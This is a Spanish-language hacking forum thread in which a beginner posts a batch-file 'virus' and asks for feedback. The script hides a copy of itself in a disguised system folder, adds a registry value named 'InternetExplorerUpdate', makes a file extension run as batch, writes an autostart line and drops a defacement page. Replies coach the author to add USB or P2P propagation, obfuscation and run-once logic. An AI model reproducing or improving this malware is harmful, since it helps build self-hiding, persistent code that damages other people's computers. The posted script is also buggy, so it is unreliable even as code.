[V][batch]Primer Intento

[dArKo2]

el primer intento que hago de hacer alguna cosa en batch...quiero que alguien se tome la molestia de revisar este codigo y si encuentra errores o me puede dar algunas sugerencias de como mejorarlo, adelante, las criticas constructivas seran bien recividas..

Código [Seleccionar] Expandir


@echo off
rem ***********************************************
rem * name: win32.amerifags                       *                                            
rem * by: sl0th                                   *        
rem * Infection method: No                        *
rem * Polymorphism: No                            *
rem * Payload: No                                 *
rem * Propagation method: No                      *                    
rem ***********************************************
copy /y "c:\System Volume Imformation\Winservices\amerifags.zzx"
assoc .zzx=batfile
reg add "HKLM\Software\Microsoft\Internet Explorer\http" /v "InternetExplorerUpdate" /d "c:\System Volume Imformation\Winservices\amerifags.zzx" /f
mkdir "c:\System Volume Imformation\Winservices"
attrib +h +r +s "c:\System Volume Imformation\Winservices\amerifags.zzx"
echo call "c:\System Volume Imformation\Winservices\amerifags.zzx">AUTOEXEC.bat
echo ^<head^> >>%USERPROFILE%\host.html
echo ^<title^> >>%USERPROFILE%\host.html
echo ^<h4^> [C.m.D] ^</h4^> >>%USERPROFILE%\host.html
echo ^</title^> >>%USERPROFILE%\host.html
echo ^</head^> >>%USERPROFILE%\host.html
echo ^<body^> >>%USERPROFILE%\host.html
echo ^<b^>^<h1^> vXed by sl0th!! ^</h1^>^</b^> >>%USERPROFILE%\host.html
echo ^</body^> >>%USERPROFILE%\host.html
eof


debo agradecer a SDK por el tutorial me esta siendo muy util y me ah alentado a seguir creando cositas como estas..

saludos

[[L]ord [R]NA]

Por cierto que quisiste hacer? un worm o virus o lo que sea que trataras de hacer que tuviese codigo maligno sin propagacion no es nada... por cierto se escribe payload.

[dArKo2]

Por cierto que quisiste hacer? un worm o virus o lo que sea que trataras de hacer que tuviese codigo maligno sin propagacion no es nada... por cierto se escribe payload.

lo de payload, lo escribi a ultimas por eso ni lo revise..pero gracias por revisar mi pedazo de code 

y tu sugerencia es....? que crees que le falta?

[[L]ord [R]NA]

propagacion, ofuscacion y mas esfuerzo... no se pero calculando tiempo util posiblemente no tardaste 5 minutos.

[F0rt3]

Tampoco entiendo lo que quieres hacer...un malware??


Como te indica R.N.A. deberás propagarlo.. ya sea por usb, p2p, etc.

[Isótopo]

-Si lo pones para que se inicie con windows, intenta que en cada ejecucion haga algo constructivo. De esa forma siempre va a hacer lo mismo: copiarse y crear el html. Podrias crear un txt en una carpeta cualquiera y comprobar si existe para saber si ya a ejecutado esa parte del code. Por ejemplo:

Código [Seleccionar] Expandir


:1
if exist c:\inicio.txt (goto 2)
rem Aqui va todo el codigo que has puesto y al final se crea el archivo de texto para asegurarse de que no vuelve
a ejecutarse esta zona.
echo. > "c:\inicio.txt"
:2
rem Aqui iría la segunda parte del code. Podrías ejecutar el html (que en ese code no lo usas para nada).
...


-¿Has comprobado que se copie correctamente? Si no recuerdo mal, deberías de poner %0 que devuelve la path del archivo ejecutandose. copy %0 "ruta a donde lo copias".

-Lo del autoexec no funciona en xp.

No se si te he servido de alguna ayuda. De todas formas, te recomiendo que si haces malware en batch, lo hagas para practicar porque no tiene futuro en ello. Los AV lo tienen bastante capado y no es muy funcional.

[dArKo2]

gracias por sus comentarios de verdad...

Tampoco entiendo lo que quieres hacer...un malware??


Como te indica R.N.A. deberás propagarlo.. ya sea por usb, p2p, etc.

simple....mantenerme practicando, es lo unico que quiero, al principio queria hacer un virus con metodo de infeccion y todo pero, luego cambie y me tome el tiempo para aprender un poco mas luego publicare otro code este estara mejorado...y tendra payload incluido